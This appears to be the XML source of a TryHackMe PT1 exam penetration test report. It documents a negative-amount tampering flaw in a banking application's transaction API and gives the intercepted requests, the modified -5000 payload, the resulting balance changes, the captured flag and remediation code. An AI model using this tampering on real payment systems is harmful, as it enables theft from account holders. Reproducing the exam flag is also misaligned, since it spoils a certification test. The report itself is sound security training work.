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p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe PT1 Certification Examination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #1 of 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>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10.200.150.100</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March 2026</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 Category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 Flaw</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Affected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/api/v1.0/transaction</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CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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 — 9.1</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6600"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">THM{1953c037-6e16-437b-b045-59b3a41b5c16}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30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Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The transaction functionality of the banking application fails to validate that the submitted amount is a positive number. By intercepting the HTTP request and changing the amount to a negative value, the attacker exploits a double-negative arithmetic error in the backend balance logic. Instead of deducting funds from the sender, the server adds funds to the attacker and deducts them from the victim. Any authenticated user can drain any other account with no special privileges required.</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Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A standard user account was registered and used to authenticate against the application API. A valid JWT session token was obtained:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1.0/auth HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"username": "user_one", "password": "password"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server responded with a signed JWT token which was included in the Authorization header of all subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Identifying the Transaction Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The JavaScript bundle served at /assets/index-D0hpbJU7.js was retrieved and analysed to enumerate all API routes used by the frontend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s http://10.200.150.100/assets/index-D0hpbJU7.js | grep -oP '"/[a-z0-9/_-]+"' | sort -u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The route /transactions/create was identified. A fund transfer was submitted through the UI and the outgoing request was intercepted using Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Intercepting the Transaction Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following POST request was captured when submitting a standard transfer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/v1.0/transaction HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: 10.200.150.100:8080</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;jwt_token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"account_number":"02715204-555c-4943-ba98-776241bb6ee7","recipient_id":"d1d4c72d-abd1-46f1-8cfb-89c7ac0be794","amount":10,"message":"payment"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 — Injecting a Negative Amount</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The amount field was changed from a positive value to a negative value in Burp Suite Repeater and the modified request was forwarded:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"account_number":"02715204-555c-4943-ba98-776241bb6ee7","recipient_id":"d1d4c72d-abd1-46f1-8cfb-89c7ac0be794","amount":-5000,"message":"payment"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The server returned a 200 OK with no validation error:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">{"message": "Transaction successful"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 — Verifying the Impact and Retrieving the Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Both account dashboards were checked after the modified request was processed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker account: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">balance increased by 5000. The funds were pulled in rather than sent out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim account: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">balance reduced by 5000, pushed into a negative balance with no lower limit enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In the transaction history the UI displayed the negative amount with a double-minus sign, which the frontend rendered as a positive received amount for the attacker. The flag was returned as confirmation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: THM{1953c037-6e16-437b-b045-59b3a41b5c16}</w:t>
      </w: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Remediation Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reject non-positive transaction amounts server-side. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The backend must validate that the amount field is a number greater than zero before processing any transaction. Return HTTP 400 Bad Request if the value is zero, negative, or non-numeric:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if not isinstance(amount, (int, float)) or amount &lt;= 0:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return jsonify({'error': 'Amount must be a positive number'}), 400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a minimum transaction amount. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Define a minimum meaningful threshold (e.g. 0.01) to prevent zero-value and fractional abuse in addition to sign validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate resulting balances before committing. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before applying any transaction, verify that the sender has sufficient funds and that the resulting recipient balance will not violate business rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply strict JSON schema validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a schema validation library to enforce type and range constraints on all numeric API fields so unexpected values never reach the business logic layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add anomaly detection on transaction patterns. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag and alert on any transaction where the amount is negative, or where a sender's balance increases as a result of initiating a transfer. These patterns are impossible in normal operation.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8"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PENETRATION TEST REPORT  |  TryHackMe PT1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2026-03-04T16:21:16.740Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-04T16:21:16.741Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>